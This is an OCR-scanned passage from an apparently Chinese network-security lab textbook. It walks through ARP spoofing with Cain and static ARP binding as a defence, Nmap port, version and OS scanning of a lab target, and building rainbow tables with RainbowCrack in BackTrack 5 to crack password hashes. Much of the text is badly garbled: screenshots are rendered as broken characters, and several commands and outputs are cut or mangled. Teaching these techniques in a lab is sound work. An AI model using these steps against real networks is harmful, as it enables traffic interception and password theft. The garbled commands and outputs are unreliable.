B) APR-FPTPS (0) 
B) АРЕ-РОРЗ5 (D) 
B) APR-INAPS (D) 
APR-LDAPS (D) 
APR-SIPS (0) 




























IP address 
182.188.1.1 








S4E6FC69D277 





гае 4— 192.168.1.18т — 6C00AE36BCSE 









[Р address [MAC address | Packet. [Рас [MAC address [IF address 














图 1-13 选取 被 欺骗 的 主机 





步骤 8. 单 击 工具 栏 上 的 Start/Stop ARP 按钮 ,Idle 将 变 为 Poisoning ,如 图 1-14 所 示 ， 
开始 捕获 欺骗 数据 包 。 此 时 ,在 靶 机 上 进行 的 网 络 浏览 等 操作 ,都 会 在 攻击 机 的 Cain 界面 
上 显示 捕获 的 数据 。 

步骤 9: 登录 靶 机 ,检查 是 否 欺 骗 成 功 。 在 靶 机 的 命令 提示 符 下 输入 “ipconfig /all” 命 
令 , 将 显示 如 图 1-15 所 示 的 结果 ,可 以 看 到 本 机 网 卡 的 MAC 地 址 及 其 他 记录 信息 。 

再 在 靶 机 的 命令 提示 符 下 输入 “arp -a” 命 令 , 将 显示 如 图 1-16 所 示 的 信息 ,可 以 看 到 IP 
地 址 为 192.168.1.1 的 MAC 地 址 ,此 时 可 以 看 到 对 应 的 MAC 地 址 已 经 被 替换 为 攻击 机 网 
卡 的 MAC 地 址 ,ARP 欺骗 成 功 。 


1.2.4 任务 与 思考 


在 不 使 用 ARP 防护 软件 的 情况 下 .如何 进行 ARP 欺骗 攻击 呢 ? 

最 常用 的 方法 是 在 同一 网 络 中 把 主机 和 网 关 进 行 IP 与 MAC 的 绑 定 。ARP 欺骗 是 通 
过 ARP 的 动态 映射 机 制 欺骗 同一 IP 子 网 中 的 机 器 ,所 以 如 果 把 ARP 全 部 设置 为 静态 就 可 
以 解决 对 内 网 主机 的 欺骗 ,同时 对 网 关 也 要 进行 IP 与 MAC 的 静态 绑 定 。 只 有 这 样 ,才能 
够 有 效 防范 ARP 攻击 的 发 生 ,具体 方法 如 下 。 
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File View Configure Tools Help 
jm m ER š 3 г 
aed m B | + 9 ш R. *)EmE# bs зш 2 Ө? й 
£ Decoders [P нео [Mp Sni tter [i Cracker [Q eme [ER com [i mirades [Eo e | 
APR Status | IP address MAC address | Packet. < Pac. МАС address | IP address 
E APR-Cert Poisoning 4 — 192168 1 187 6COOAES8BCSE 1 1 5426FC69D277 — 192.168.1.1 
S, APR-DNS 
BH ›тк-5зн-1 0) 
B aries 0) 
Bj APR-ProxyHTTPS (0) 
9 АРЕ-ЕШР (0) 
B APR-FTFS (0) 
(Ө кРЕ-РОРЗ5 (0) Р 3 
B) xrg-IMAPS (0) 
B APR-LDAPS 0) Status IP address MAC address [Packet | € Pac [MAC address — [IP address 
Â rss (0) 
Ñ 
< > 
Configuration / Routed Packets 











图 1-14 开始 欺骗 操作 


albo Н + E" Ba G % ; Ө? ñ 


WINDOWS\systema32\cl 
ТЫЗ 1985-2081 Microsoft Corp. dress 

















NDocuments and Settings MAdninistrator;ipconfig /all 
Windows IP Configuration 


Host Name . .... + + + + + + + š www-5d28aac4fe4 
Primary Dns Suffix ....... 
Node Tipo , ¿ ¿ 5 < <. а W e G t Unknown > 


IP Routing Enabled. - - “ИК = 


MINS Proxy Enabled. 
po. 56.34 


[Ethernet adapter 本 地 连接 : 255.245. 
[ю.5в.эз 
Connection-specific DNS Suffix . 69.25 
Description - - - - - - - - - - - po. s6. 32 


Physical Address. 

Dhcp Enabled. ИЧТИ 

TE эь „же sls бз ә s -168.1.186 
Subet Mask... .......- 255.255.8 
Default Gateway . - - - - - - - - 168.1.1 
DNS $егоетз........... -168.1.1 





\Documents and Settings\Adninistrator> 
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FINDO¥S\systen32\cad. exe [-[5] 


Internet Ў Туре 
192.168.1. dynanic 
dynanic 

dynanic 

dynanic 

[E dynanic 

80-21-86-5a-89-e6 dynanic 

ec-a8-6b-24-44-67 dynanic 

dynanic 

dynanic 

dynanic 

dynanic 

dynanic 

dynanic 

invalid 

ec-a8-6b-2d-39-9a dynanic 


:NDocuments and Settings MAdmi, ratordarp -a 


Interface: 192.168.1.187 #х1йййз 
Internet Address al Addr Туре 
192.168.1.1 6c-14-6e-52-c9-94 dynanic 


1-16 ”运行 “arp -a” 命 令 后 的 显示 信息 


对 每 台 主机 进行 IP 和 MAC 地 址 之 间 的 静态 绑 定 ,具体 通过 执行 “arp -s IP MAC 地 
现 ,如 执行 “arp -s 192. 168. 10. 1 AA-AA-AA-AA-AA-AA” 命 令 。 当 成 功 设置 
后 ,在 主机 上 通过 执行 “arp -a” 命 令 , 可 以 看 到 相关 的 提示 。 


Internet Address Physical Address Type 
192.168.10.1 АА – AA — AA — АА – АА – АА static( 静 态 ) 


如 果 没 有 进行 绑 定 , 即 主机 配置 为 动态 映射 , 则 显示 以 下 类 似 的 信息 。 


Internet Address Physical Address Туре 
192.168.10.1 АА – АА – AA — АА – АА – АА dynamic( 动 态 ) 


1.3 端口 扫描 : 利用 Nmap 工具 进行 端口 扫描 


1.3.1 预备 知识 : Nmap 工具 介绍 





Nmap(Network Mapper) 最 早 是 Linux 下 的 网 络 扫 描 和 嗅 探 工 具 包 ,是 一 个 综合 的 \ 功 
能 全 面 的 端口 扫描 工具 ,被 网 络 安全 专业 人 员 广 泛 使 用 。Nmap 工具 由 Fyodor 编写 并 维 
护 ,由 于 其 具备 稳定 性 和 灵活 性 ,是 渗透 测试 人 员 必 备 的 工具 。 

1. Nmap 工具 的 功能 

除了 端口 扫描 外 ,Nmap 还 提供 了 以 下 功能 。 

(1) 主机 发 现 。Nmap 可 以 用 来 查找 目标 网 络 中 的 在 线 主机 。 默 认 情 况 下 ,Nmap 通过 
ICMP 回应 请 求 .向 443 端口 发 送 TCP SYN 包 、 向 80 端口 发 送 TCP АСК 包 和 ICMP 时 间 
蕉 请 求 方式 发 现 目标 主 机 。 

(2) 服务 /版 本 识别 。Nmap 发 现 端口 后 ,可 以 进一步 检查 服务 协议 、. 应 用 程序 名 称 、 版 
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本 号 .主机 名 、 设 备 类 型 和 操作 系统 等 信息 。 

(3) 操作 系统 识别 。Nmap 向 远程 主机 发 送 系 列 数据 包 , 并 检查 回应 信息 。 然 后 与 操 
作 系 统 指纹 数据 库 进行 比较 ,并 显示 匹配 结果 的 细节 。 

(4) 网 络 路 由 跟踪 。Nmap 通过 尽 可 能 到 达 目 标 系统 的 方式 确定 目标 系统 的 端口 和 协 
W. Nmap 路 由 跟踪 从 较 高 的 TTL(Time To Live, 生 存 时 间 ) 开 始 , 并 逐步 递减 直到 TTL. 
到 达 0。 

(5) Nmap 脚本 引擎 。 使 用 脚本 引擎 ,Nmap 也 可 以 用 于 检查 网 络 服务 中 存在 的 漏洞 、 
枚 举目 标 系 统 资源 等 操作 ,为 攻击 者 获取 基本 的 信息 。 

2. Nmap 扫描 方式 

Nmap 扫描 方式 主要 包括 以 下 几 种 类 型 。 

(1) Half-open scanning。 半 开放 扫描 (CHalf-open scanning) 是 Nmap 默认 的 扫描 方式 ， 
该 方式 发 送 SYN 到 目标 端口 ,如 果 收 到 SYN/ACK 回复 ,可 以 判断 端口 是 开放 的 ; 如 果 收 
到 RST 包 , 说 明 该 端口 是 关闭 的 ; 如 果 没 有 收 到 回复 ,那么 判断 端口 是 被 屏蔽 的 (filtered) 。 
因为 该 方式 仅 对 目标 主机 的 特定 端口 发 送 SYN 包 , 但 不 建立 完整 的 TCP 连接 ,所 以 相对 比 
较 隐 项 ,而 且 效率 比较 高 ,适用 范围 广 。 

(2) TCP connect。 使 用 系统 网 络 API connect 向 目标 主机 的 端口 发 起 连接 ,如 果 无 法 
连接 ,说 明 该 端口 关闭 。 该 方式 扫描 速度 比较 慢 , 而 且 由 于 建立 完整 的 TCP 连接 会 在 目标 
主机 上 留 下 记录 信息 ,缺乏 隐蔽 性 ,因此 TCP connect 是 TCP SYN 无 法 使 用 才 考虑 选择 的 
Jr. 

(3) ТСР ACK scanning。 向 目标 主机 的 端口 发 送 ACK 包 , 如 果 收 到 КТ 包 , 说 明 该 
端口 没有 被 防火 墙 屏 项 ; 如 果 没 有 收 到 RST 包 ,说 明 被 屏蔽 。 该 方式 只 能 用 于 确定 防火 墙 
是 否 屏蔽 某 个 端口 ,可 以 辅助 TCP SYN 方式 判断 目标 主机 防火 墙 的 状况 。 

(4) TCP FIN/Xmas/NULL scanning。 这 3 种 扫描 方式 称 为 秘密 扫描 (stealthy scan), 
因为 操作 过 程 相 对 比较 隐蔽 ,FIN 扫描 向 目标 主机 端口 发 送 的 TCP FIN 包 ( 或 Xmas tree 
包 , 或 NULL 包 ) ,如果 收 不 到 对 方 的 RST 回复 包 , 那 么 说 明 该 端口 是 关闭 的 。 

其 中 ,Xmas tree 包 是 指 flags 中 FIN URG PUSI 设置 为 1 的 TCP 包 ,NULL 包 是 指 所 
有 flags 都 为 0 的 TCP 包 。 

3. Nmap 参数 

Nmap 工具 的 主要 参数 如 下 。 

-sS/sT/sA/sW/sW: 指定 使 用 TCP SYN/CONNECT ( )/ACK/window/Maimon 
Scans 的 方式 对 目标 主机 进行 扫描 。 

-sU: 指定 使 用 UDP 扫描 方式 确定 目标 主机 的 UDP 端口 状态 。 

-sN/sF/sX: 指定 使 用 ТСР Null, FIN 和 Xmas scans 秘密 扫描 方式 协助 探测 对 方 的 
TCP 端口 状态 。 

-ssanflags< flags >: 定制 TCP 包 的 flags, 

-sl: 指定 使 用 idle scan 方式 扫描 目标 主机 (前 提 是 需要 找到 合适 的 zombie host) 。 

-sY/sZ: 使 用 SCTP INIT/cookie-ECHO 扫描 SCTP 协议 端口 的 开放 情况 。 需 要 说 明 
的 是 ,因为 SCTP(Stream Control Transmission Protocol, 流 控制 传输 协议 ) 在 实际 网 络 中 
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较 少 使 用 ,所 以 此 参数 的 使 用 也 较 少 。 

-b < FTP relay host >: 使 用 FTP bounce scan 扫描 方式 。 

-p < port ranges >: 扫描 指定 端口 , 如 -p22; -р1-65535; -pU; 53, 111, 137, Т: 
21-192. 168. 1. 18080, S; 9. Ж Тж TCP,U 代表 UDP,S 代表 SCTP 协议 。 

-Е: 快速 模式 (fast mode) , 仅 扫描 编号 为 前 100 的 端口 。 

-r: 不 进行 端口 随机 打 乱 的 操作 。 若 无 该 参数 ,Nmap 会 将 要 扫描 的 端口 以 随机 顺序 方 
式 扫描 ,以 让 Nmap 的 扫描 不 易 被 对 方 防火 墙 检测 到 。 

-top-ports < number >; 扫描 开放 概率 最 高 的 端口 。 默 认 情 况 下 ,Nmap 会 扫描 最 有 可 
能 被 使 用 的 1000 个 ТСР 端口 。 

-port-ratio < ratio >: 扫描 指定 频率 以 上 的 端口 ,其 中 -sS 表示 使 用 TCP SYN 方式 扫描 
ТСР 端口 ,-sU 表示 扫描 UDP 端口 ,-T4 表示 时 间 级 别 配置 4 级 ,-top-ports 300 表示 扫描 
最 有 可 能 开放 的 300 个 端口 (TCP 和 UDP 分 别 有 300 个 端口 ) 。 


1.3.2 实验 目的 和 条 件 


1. 实验 目的 
通过 本 实验 ,读者 可 以 了 解 Nmap 工具 的 功能 和 应 用 ,并 掌握 以 下 内 容 。 
(1) 通过 对 设备 或 防火 墙 的 探测 审核 其 安全 性 。 
(2) 探测 目标 主机 所 开放 的 端口 。 
(3) 通过 识别 新 的 服务 器 ,审核 网 络 的 安全 性 。 
(4) 探测 网 络 上 的 主机 。 
2. 实验 清单 及 软 硬 件 要 求 
本 实验 所 需要 的 软 硬 件 清单 如 表 1-3 所 示 。 
表 1-3 Nmap 工具 应 用 实验 清单 




















类 = 序 号 软 硬 件 要 求 я № 
f 数量 1f 
攻击 机 2 操作 系统 版 本 Kali Linux 
3 软件 版 本 
数量 1 台 
UBL 2 操作 系统 版 本 Windows 7 
3 软件 版 本 无 











1.3.3 实验 过 程 


步骤 1: 登录 Windows 7 靶 机 查看 靶 机 IP 地 址 。 进 入 Windows 7 操作 系统 的 靶 机 , 运 
ff XAMPP(Apache 十 MySQL 十 PHP 十 PERL) 工 具 ( 需 要 事先 安装 和 设置 ), 开启 Apache 
和 MySQL 服务 ,然后 在 命令 提示 符 下 运行 “ipconfig” 命 令 ,查看 靶 机 的 IP 地 址 ,显示 信息 
如 图 1-17 所 示 。 

步骤 2: 登录 Kali, 并 使 用 Nmap 工具 进行 端口 扫描 。 首 先进 入 Kali 攻击 机 ,使 用 
“ifconfig” 命 令 查 看 攻击 机 的 ІР 地 址 ,如 图 1-18 所 示 。 
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sadmin>ipconfig 


Jindovs ІР 配置 


: example.org 
d :17dbx1i 


p 


: example.org 





图 1-17 ”运行 “ipconfig” 命 令 查看 靶 机 的 IP 地 址 


rootükali:-4 ifconfig 
ethl Link encap:Ethernet  HWaddr 6c:91:d0:62:a1:01 
inet addr:172.16.1.243 Всаѕї:172.16.1.255 Mask:255.255.255.0 
inet6 addr: fe8 6e91:d0ff:fe62:a1l01/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:l 
RX packets:4291 еггог<:@ dropped:0 overruns:9 Ғгате:9 
TX packets:19027 errors:0 dropped:0 overruns:0 carrier:G 
collisions:0 txqueuelen:1000 
RX bytes:482510 (471.2 KiB) TX bytes:1129889 (1.0 MiB) 


Link encap:Local Loopback 

inet addr:127.0.0.1 Mask:255.0.0.0 

inet6 addr: ::1/128 Scope:Host 

UP LOOPBACK RUNNING MTU:65536 Metric:l 

RX packets:134 error: dropped:0 overrun: 

TX packets:134 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:0 

RX bytes:6900 (6.7 KiB) TX bytes:6900 (6.7 KiB) 





rootgkali:- | 


1-18 ”使 用 “ifconfig” 命 令 查看 攻击 机 的 IP 地 址 


步骤 3: 在 攻击 机 中 输入 “nmap 172. 16. 1.252” 命 令 , 用 Nmap 进行 简单 扫描 。Nmap 默认 
发 送 一 个 ping 数据 包 , 用 来 探测 目标 主机 在 1 一 10 000 范围 内 所 开放 的 端口 ,如 图 1-19 所 示 。 


Д 
rootgkali:-4 птар 172.16.1.252 


Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2018-05-15 18:11 EDT 
Nmap scan report for 172.16.1.252 
Host is up (0.900465 latency). 
Not shown: 997 filtered ports 
PORT STATE SERVICE 

open http 

open https 

mysql 

MAC Address: 6C:7D:5F:C3:2bE:01 (Unknown) 





Nmap done: 1 IP address (1 host up) scanned in 32.02 seconds 


图 1-19 使 用 “nmap 172. 16. 1. 252” 命 令 扫 描 目标 主机 
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步骤 4: 如 


并 详细 显示 返回 的 结果 。 其 中 ,-vv 参数 用 于 设置 对 返 


图 1-20 所 示 ,输入 “nmap -vv 172. 16. 1.252” 命 令 , 用 Nmap 进行 简单 扫描 ， 





El 








内 容 显示 其 详细 信息 。 








:~# nmap -vv 172.16.1.252 


Starting Nmap 6.49BETA4 ( https nmap.org ) at 2018-05-15 18:14 EDT 


Initiating 


ARP Ping Scan àt 1 


anning 172.16.1. 
Completed ARP Ping Scan at 18:14, 20s elapsed (1 total hosts 


Initiating 


Parallel DNS resolution of 1 host. at 18:14 


Completed Paral olution of 1 host. at 18:14, 13.00s elapsed 
Scan at 18:14 
.16.1.252 [1000 ports] 
open port 443/tcp on 1 


Initiatin 


Discovered 


ope 


SYN can at 1 
report for 172.16.1.252 


Host is up, 


Scanned at 
Not shown 


received arp-response (0.0 
2018-05-15 18:14:03 EDT for 
997 filtered ports 

no- responses 


PORT STATE SERVICE REASON 
80/tcp open http y k ttl 128 


所 示 。 





ttl 128 
ttl 1 
(Unknown) 


1-20 ”运行 “nmap -vv 172. 16. 1.252” 命 令 扫描 目标 主机 并 显示 详细 结果 


人 “nmap -sV 172. 16. 1.252” 命 令 , 用 Nmap 进行 版 本 探测 ,探测 结果 如 图 1-21 


He nmap -sV 172.16.1. 


6.49BETA4 ( https nmap.org ) at 2018-05-15 18:15 EDT 


an report for 172.16.1.252 


15 up 
Not shown: 


(9. 49s latency). 

997 filtered ports 
SERVICE VERSION 
http Apache httpd 2.4.7 ((Win32) Opel 
ssl/http Apache httpd 4 ((Win32) Open: 


/tcp open mysql MySQL (unautho 
Address: 6 Q1 (Unknown) 


Service detection performed. Please report any incorrect results at htt 
:org. bmit/ 
Nmap done: 1 IP address (1 host up) scanned in 58.57 secon 





图 1-21 运行 “nmap -sV 172. 16.1. 252” 命 令 探 测 目标 主机 运行 的 版 本 号 


步骤 6. 输 


入 “nmap -version-intensity 3 172. 16. 1. 252” 命 令 ,对 指定 版 本 进行 深度 探 


测 ,运行 过 程 和 结果 如 图 1-22 所 示 。 其 中 ,指定 版 本 的 探测 强度 为 3( 范 围 为 0 一 9) ,数值 越 
高 ,探测 服务 越 准确 ,但 是 运行 时 间 也 比较 长 。 


步骤 7: 输 


果 信 息 ,如 图 1- 


步骤 8: 输 


人 “nmap -version-trace 172. 16. 1. 252” 命 令 .显示 详细 的 版 本 探测 过 程 和 结 
23 所 示 。 
A"nmap -O 172. 16. 1. 252” 命 令 ,Nmap 通过 目标 开放 的 端口 探测 主机 所 运 


行 的 操作 系统 类 型 ,如 图 1-24 所 示 。 这 是 信息 收集 中 很 重要 的 一 步 ,可 以 帮助 攻击 者 找到 
特定 操作 系统 上 是 否 有 漏洞 。 





:~# nmap -version-intensity 3 172.16.1 


Starting Nmap 6] 49BETA4 ( https: 可 ) at 2018-05-15 18:20 E 
Nmap scan report r 172.16.1 
Host is up .00046s latency). 


Not shown: 997 filtered ports 
STATE SERVI 
open http 
open https 
/tcp open mysql 
MAC Address: 6C:7D:5F:C3:2E:01 (Unknown) 





INmap doni 1 IP address (1 host up) scanned in 31 seconds 


图 1-22 运行 “nmap -version-intensity 3 172. 16. 1. 252” 命 令 进行 深度 探测 


# птар -version-trace 172.16.1.2 


Starting Nmap 6.49BETA4 ( https: .org ) at 2018- 
PORTS: Using top 工 porffs found open (TCP:1000, UDP:0, 
E Timing report - 

hostgroups: min 1, max 100000 

rtt-timeouts 900, min 100, 

LET an-d 

parallelism: 

max-retri 9 -timeout 

min-rat max-rate: 9 


Packet — filter (device ethl arp and arp[18:4] 

] OxA101 

Overall sending rates: 5.01 packets / s, 210.43 byte 
mass_rdns: Using DNS 172.16.1.199 

mass_dns: warning: got а READ:ERROR іп read_evt_handler() 
m dns: warning: got a READ:ERROR in read_evt_handler() 





图 1-23 运行 “nmap -version-trace 172. 16. 1. 252” 命 令 显 示 详 细 的 版 本 信息 


:-# nmap -0 172.16.1.252 


Starting Nmap 6.49BETA4 ( http /nmap.org ) at 2018-05-15 18:34 EDT 
Nmap scan report for 172.16.1. 
00050s latency). 
filtered ports 
STATE SERVI 
open http 
open https 
open mysql 
6C: :C3:2E:01 (Unknown) 
0SScan results may be unreliable because we could not find at least 1 o| 


general purpose |phone 

crosoft Windows ecd e LEUR 

o:microsoft :windows 

/o:microsoft:windows 7::-:professional cpe o:microsoft :windo 
indows vista::- /o:microsoft 





1-24 运行 “nmap -O 172. 16. 1.252” 命 令 探测 主机 所 运行 的 操作 系统 类 型 
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步骤 9: 输入 “nmap -osscan-guess 172. 16. 1. 252” 命 令 ,大 胆 猜测 对 方 主机 的 操作 系统 
类 型 ,运行 结果 如 图 1-25 所 示 。 此 操作 的 准确 性 会 降低 ,但 会 尽 可 能 多 地 为 用 户 提供 潜在 
的 操作 系统 类 型 。 


11:-—# npap -osscan-guess 172.16.1.252 


Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2018-05-15 18:40 EDT 
Nmap scan report for 172.16 
Host is up (0.00055s latency). 
7 filtered ports 
SERVICE 
http 
https 
mysql 
C:7D:5F:C3:2E:01 (Unknown) 





图 1-25 运行 “nmap -osscan-guess 172. 16. 1.252” 命 令 探测 潜在 的 操作 系统 类 型 


1.3.4 任务 与 思考 


攻击 者 要 确定 一 个 网 络 的 整体 架构 ,可 以 使 用 Ping 扫描 和 ТСР SYN 扫描 。Ping 扫描 
通过 发 送 ICMP(Internet Control Message Protocol, Internet 控制 消息 协议 ) 回 应 请 求 数 据 
H TCP 应 答 (Acknowledge,ACK) 数 据 包 ,确定 主机 的 状态 ,非常 适合 检测 指定 网 段 内 正 
在 运行 的 主机 数量 。 

使 用 TCP SYN 扫描 时 ,扫描 器 向 目标 主机 的 一 个 端口 发 送 请 求 连 接 的 SYN 包 , 扫 描 
器 在 收 到 SYN/ACK 后 ,不 是 发 送 ACK 应 答 而 是 发 送 RST 包 请 求 断 开 连接 。 这 样 ,TCP 
三 次 握手 就 没有 完成 ,无 法 建立 正常 的 TCP 连接 ,因此 ,这 次 扫描 就 不 会 被 记录 到 系统 日 志 
中 。 这 种 扫描 技术 一 般 不 会 在 目标 主机 上 留 下 扫描 痕迹 ,但 是 需要 有 root 权限 。 


1.4 离线 攻击 工具 : 彩虹 表 破 解 
1.4.1 预备 知识 : 彩虹 表 


。 彩 虹 表 

彩虹 表 (Rainbow Table) 是 一 种 破解 Hash 函数 的 技术 。 利 用 彩虹 表 技 术 , 可 以 针对 不 
同 的 Hash 函数 存在 的 漏洞 进行 暴力 破解 。 例 如 ,对 于 Windows 操作 系统 中 经 过 LM- 
Hash 或 NTLM-Hash 加 密 处 理 后 的 SAM 文件 ,可 以 通过 相应 的 彩虹 表 工 具 进 行 破解 。 
彩虹 表 破 解 是 通过 具体 的 彩虹 表 破 解散 列 数据 的 工具 , 它 采 用 空间 换 时 间 的 技术 思想 ， 
其 方法 不 同 于 暴力 破解 攻击 。 暴 力 破 解 攻击 会 将 密码 可 能 出 现 的 值 形成 一 本 字典 ,然后 
一 个 接 一 个 地 计算 散 列 值 ,并 与 目标 散 列 值 进行 对 比 。 如 果 两 个 散 列 值 相同 ,就 枚 举 出 
了 密码 。 

暴力 破解 法 比 空间 换 时 间 的 技术 慢 得 多 ,因为 攻击 者 要 计算 散 列 值 ,然后 进行 匹配 。 而 
使 用 空间 换 时 间 的 技术 ,所 有 可 能 的 散 列 值 已 经 预先 计算 完毕 ,攻击 者 要 进行 的 只 是 匹配 流 
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程 ,而 匹配 是 一 种 快速 完成 的 运算 。 

BackTrack 包含 以 下 3 种 彩虹 表 。 

CD Rtgen: 用 于 生成 彩虹 表 , 即 通常 所 讲 的 预计 算 的 阶段 。 彩 虹 表 包含 字典 、 散 列 、 散 
列 算 法 及 字典 长 度 范 围 。 

(2) Rtsoft; 用 于 整理 rtgen 生成 的 彩虹 表 。 

(3) Rerack: 用 于 在 彩虹 表 中 查找 某 个 散 列 值 。 

2. RainbowCrack 

RainbowCrack 是 一 个 使 用 内 存 时 间 交 换 技术 (Time-Memory Trade-Off Technique) 加 
速 口 令 破解 过 程 的 口令 破解 器 。RainbowCrack 使 用 了 彩虹 表 , 即 一 张 预 先 计算 好 的 明文 和 
散 列 值 的 对 照 表 。 通 过 预先 创建 彩虹 表 ,能 够 在 以 后 破解 口令 时 节约 大 量 的 时 间 。 

RainbowCrack 包含 以 下 实用 程序 。 

(1) rtgen. ехе: 彩虹 表 生 成 器 ,生成 口令 、 散 列 值 对 照 表 。 

(2) rtsort. exe: 排序 彩虹 表 ,为 rcrack. exe 提供 输入 。 

(3) rcrack. exe: 使 用 排 好 序 的 彩虹 表 进 行 口令 破解 。 


1.4.2 实验 目的 和 条 件 





1. 实验 目的 

通过 本 实验 ,使 读者 掌握 以 下 内 容 。 

(1) 学 习 BackTrack5 的 功能 和 基本 使 用 方法 。BackTrack5 是 网 络 安全 领域 非常 著名 
的 黑客 攻击 平台 ,是 一 个 封装 好 的 Linux 操作 系统 ,内 置 了 大 量 的 网 络 安全 检测 工具 及 黑客 
破解 软件 等 。 

(2) 掌握 RainbowCrack 的 使 用 方法 。 

(3) 使 用 彩虹 表 破 解散 列 值 。 

2. 实验 清单 及 软 硬 件 要 求 

本 实验 所 需要 的 软 硬 件 清 单 如 表 1-4 所 示 。 


表 1-4 彩虹 表 破 解 实验 清单 























类 型 序 号 软 硬 件 要求 规 格 
1 数量 16 
юз 2 操作 系统 版 本 BackTrack 5(BT5) 
3 软件 版 本 RainbowCrack 


1.4.3 实验 过 程 


步骤 1: 登录 BackTrack 5( 应 事先 安装 和 配置 ) 靶 机 。 为 了 方便 操作 ,对 于 命令 提示 符 
不 是 非常 熟悉 的 读者 ,可 以 输入 “startx” 命 令 , 打 开 BackTrack 5 图 形 用 户 界面 ,如 图 1-26 
和 图 1-27 所 示 。 
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1.616592 

1.617434] 
1.6193941 
1.620313] 
1.621265] 
1.622204] 
1.6269801 
1.6332271 
1.7323861 


.875817] 
18801621 
.112048] 
E 
.3608201 
3884611 
.3893671 
6725021 
6874451 
/inputz 
2.6896771 
ablet] on usb 
2.691679] 
2.692641] 
1544121 
3.156065] 
inux bt 3.2.6 





EJ 4х/4х cd/ru A RE 
pai Uniform CD-ROM driver Revision: 3.20 
йа: unknown partition table 
sr Attached scsi generic sgl type 5 
54 [sda] fittached SCSI disk 
Frecing unused kernel memory: ?04k freed 
Write protecting the kernel text: 5508k 
Write protecting the kernel read-only data: 2108k 
Refined TSC clocksource calibration: 2666.356 MHz 


udev: starting version 151 

udevd (83): /proc/83/oom adj is deprecated, please use ¿proc/B3/oom_score_adj instead. 

usb 1-1: пем full-speed USB device number 2 using uhci hcd 

e1000: Intel(R) PR0/1000 Metuwork Driver — version 7.3.21-k8-MAPI 

e1000: Copyright (с) 1999-2006 Intel Corporation 

ACPI: PCI Interrupt Link [LNKB] enabled at IRQ 10 

e1000 0000:00:12.0: PCI INT ñ -> Link[LMKB] -> GSI 10 (level, high) -> IRQ 10 

FDC Ө is а 5820788 

input: QEMU 1.0.50 QEMU USB Tablet as /деоісеѕ/рсі0000 :00,/0000 :00:01.2/usb1/1-1/1-1:1.0/inpu 


generic-usb 0003:0627:0001.0001: input,hidrauO: USB HID v0.01 Pointer [ЕМИ 1.0.50 ДЕМИ USB 
0000:00:01.2-1/input6 

usbcore: registered new interface driver usbhid 

usbhid: USB HID core driver 

e1000 0000:00:12.0: ethð: (PCI:33MHz bit) 6c:62:10:b6:6b:ec 

€1009 0000:90:12.0: еїһӨ: Intel(R) FRU/1000 Network Comection 

#1 SHP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux 


System information disabled due to load higher than 1.0 
otabt:"# startx 





Applications 


图 1-26 BackTrack 5 字符 型 操作 模式 


Places System *4| Sun Jan 20, 12:28 PM 








图 1-27 BackTrack 5 
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步骤 2 
令 切 换 到 RainbowCrack 工作 目录 


rainbowcrack” 命 


打开 终端 (terminal) 操 作 窗 口 , 使 用 “cd /pentest/passwords 
后 使 用 "1s” 命 令 查看 ,如 图 1-28 所 示 








root@bt: /pentest/web/w3af 
File Edit View Terminal Help 


scripts w3af console 
tools — w3af gui 








图 1-28 切换 到 RainbowCrack 工作 目录 
步骤 3: ШИ“ 


^ v X root@bt: /pentest/passwords/rainbowcrack 
File Edit View Terminal Help 





/rtgen” 命 令 查 看 帮助 文档 ,如 图 1-29 所 示 。 





rootebt : /pentest/passwords/rainbowcrack# ./rtgen 
RainbowCrack 1.5 

pyright 2003 RainbowCrack Pro All-righte-caserved 
official Website: http://project-rainbowcrack.com/ 


usage: rtgen hash algorithm charset plaintext len mip-ptSintextylen max table in| 
dex chain len chain num part index 
hash algorithm charset plaintext fen min plainteft len пах Ще іп 


" len limik: 9 - 45 

md5, plaintext Jeq lipiti FS X 

Sha plait At де) пі бо - до 
qtshal йт en 

halflmchall pl 

ntl l, plaintext len limit: Ө - 

oracle-SYSTEM, plaintext len limit: Ө - 

md5-half, a ext n limit: 9 - 15 


le: rtgen md5 loweralpha 1 7 8 
g pha 1 
pentest/passwords/rainbowcrack& 





图 1-29 EA“. /rtgen” 命 令 查看 帮助 文档 





BE 4. 创建 第 一 张 彩虹 表 LEE 7J md5. loweralpha # 5-5. 0. 2000x80000. testing. rt Ж 
Я 1-30 所 示 。 
JE 5: 创建 第 








二 张 彩 虹 表 ,保存 为 md5_loweralpha # 





.1 2000x80000 testing. rt 








: 使 用 "1s” 命 令 查看 刚 生 成 的 两 张 彩 虹 表 , 如 图 1-31 所 示 。 
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入 х root@bt: /pentest/passwords/rainbowcrack 
File Edit View Terminal Help 


bt: /pentest/passwords/rainbowcracks n 
pentest/passwords 
pentest/passwords 
pentest/passwords/rainbowcrac 


pentest/passwords/rainbowcrac 


pentest/passwords/rainbowcrack& ./rtgen таз ieWÉralphaWs 5 872 


le md5 loweralphasS-5 Ө 200 8 6.rt parameters 


opqr 
шас А 
[nn оћ 

plaintext їо 


equentia begin from 0 
епегаї 
ins generated (Ө 
65536 of 8 ains generated (Ө 
rated ( 
wcrack# 





图 1-30 创建 第 一 张 彩虹 表 


x root@bt: /pentest/passwords/rainbowcrack 
File Edit View Terminal Help 
:/pentest/passwords/rainbowcrack# 
pentest/passwords/rainbowcrack# 
:/pentest/passwords/rainbowcrack# 
:/pentest/passwords/rainbowcrack# 
pentest/passwords/rainbowcrack# 
pentest/passwords 
2 0st” rcrack P Cangen 
ha#5-5 1 2 $.rt rea uf rtczrt гест 
: /pentest/passwords /rainbowcracké 
pentest/passwords /rainbowcrack£ 
: /pentest/passwords /rainbowcrac 
pentest/passwords /rainbowcrac 
: /pentegt/passwords/rainbowcgacké 
pente Lípassuordsy Sinbowc аск 
i I г о ск 
pentast/patsswords/ 
:/pentest/passwords 
pentest/passwords 
pentest/passwords/rainbowcrack# 
pentest/passwords/rainbowcraci 
:/pentest/passwords/rainbowcrack# 
pentest/passwords/rainbowcrack# 
pentest/passwords/rainbowcrack# 
pentest/passwords/rainbowcraci 











131 使 用 “ls" 命 令 查看 生成 的 两 张 彩虹 表 


x 


EE 7: 使 用 “. /rtsort” 命 令 查 看 帮助 文档 ,如 图 1-32 所 示 。 
JE 8: 使 用 rtsort 工具 整理 第 一 张 彩 虹 表 ,如 图 1-33 所 示 。 
步骤 9. 使 用 rtsort 工具 整理 第 二 张 彩虹 表 。 
